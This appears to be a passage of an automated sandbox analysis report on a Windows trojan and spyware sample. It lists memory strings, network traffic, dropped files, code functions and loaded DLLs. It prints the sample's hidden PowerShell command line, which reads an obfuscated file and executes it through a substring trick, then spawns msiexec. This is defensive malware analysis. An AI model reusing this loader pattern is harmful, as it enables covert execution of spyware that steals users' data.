          Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.9:49861 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49871 version: TLS 1.2
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_00404C7B0_2_00404C7B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3CB4E2_2_07E3CB4E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BC1907_2_006BC190
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BB3287_2_006BB328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BC4707_2_006BC470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BC7527_2_006BC752
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BCA327_2_006BCA32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006B4AD97_2_006B4AD9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BBBD27_2_006BBBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BBEB07_2_006BBEB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BF0077_2_006BF007
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BE5287_2_006BE528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006BE5177_2_006BE517
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006B67307_2_006B6730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006B98587_2_006B9858
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274511C07_2_274511C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274500407_2_27450040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E0587_2_2745E058
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745D3407_2_2745D340
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745D3507_2_2745D350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27457B707_2_27457B70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274573D87_2_274573D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274573E87_2_274573E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745DBF17_2_2745DBF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745D7987_2_2745D798
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745D7A87_2_2745D7A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745C6487_2_2745C648
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745FA597_2_2745FA59
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745FA687_2_2745FA68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745F6007_2_2745F600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745F6107_2_2745F610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745C6387_2_2745C638
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745CEF67_2_2745CEF6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745CEF87_2_2745CEF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745CA9E7_2_2745CA9E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745CAA07_2_2745CAA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745B9407_2_2745B940
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27450D517_2_27450D51
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745ED507_2_2745ED50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745ED607_2_2745ED60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27450D607_2_27450D60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274509007_2_27450900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E9087_2_2745E908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745B9307_2_2745B930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745C1E07_2_2745C1E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745C1F07_2_2745C1F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745BD887_2_2745BD88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27457D907_2_27457D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745BD987_2_2745BD98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745F1A97_2_2745F1A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274511B07_2_274511B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745F1B87_2_2745F1B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E0497_2_2745E049
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274584607_2_27458460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274538607_2_27453860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274538707_2_27453870
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745DC007_2_2745DC00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274500127_2_27450012
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745B4D77_2_2745B4D7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745B4E87_2_2745B4E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274508F07_2_274508F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E8F87_2_2745E8F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274504907_2_27450490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274504A07_2_274504A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E4A07_2_2745E4A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2745E4B07_2_2745E4B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748C3887_2_2748C388
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748AA587_2_2748AA58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748D6707_2_2748D670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274886087_2_27488608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748B6E87_2_2748B6E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748BD387_2_2748BD38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748C9D87_2_2748C9D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274811A07_2_274811A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27488C517_2_27488C51
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748A4087_2_2748A408
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748D0287_2_2748D028
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748B0A07_2_2748B0A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274867787_2_27486778
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748C3787_2_2748C378
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274867767_2_27486776
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274863127_2_27486312
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274863207_2_27486320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274837307_2_27483730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27486BC17_2_27486BC1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27486BD07_2_27486BD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748A3F87_2_2748A3F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274833A87_2_274833A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274833B87_2_274833B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748AA487_2_2748AA48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27485A607_2_27485A60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748D6627_2_2748D662
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27485A707_2_27485A70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748560A7_2_2748560A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274886027_2_27488602
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274856187_2_27485618
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27485EC87_2_27485EC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748B6D97_2_2748B6D9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27485EB87_2_27485EB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27480D487_2_27480D48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27487D487_2_27487D48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27487D587_2_27487D58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274879007_2_27487900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748BD287_2_2748BD28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27480D397_2_27480D39
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748C9C87_2_2748C9C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748518A7_2_2748518A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274851987_2_27485198
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274811917_2_27481191
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274881A07_2_274881A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274881B07_2_274881B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274870497_2_27487049
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274800407_2_27480040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274870507_2_27487050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274828187_2_27482818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748D0187_2_2748D018
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274844307_2_27484430
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274808E07_2_274808E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274808F07_2_274808F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274878F07_2_274878F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274804887_2_27480488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2748B08F7_2_2748B08F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274804987_2_27480498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274874977_2_27487497
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_274874A87_2_274874A8
          Source: ln5S7fIBkY.exeStatic PE information: invalid certificate
          Source: ln5S7fIBkY.exe, 00000000.00000000.1510188691.00000000007D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs ln5S7fIBkY.exe
          Source: ln5S7fIBkY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@4/4
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeFile created: C:\Users\user\AppData\Local\downrangeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeFile created: C:\Users\user\AppData\Local\Temp\nse4B5E.tmpJump to behavior
          Source: ln5S7fIBkY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 00000007.00000002.2772117735.0000000024822000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024812000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024830000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024864000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: ln5S7fIBkY.exeVirustotal: Detection: 68%
          Source: ln5S7fIBkY.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeFile read: C:\Users\user\Desktop\ln5S7fIBkY.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ln5S7fIBkY.exe "C:\Users\user\Desktop\ln5S7fIBkY.exe"
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
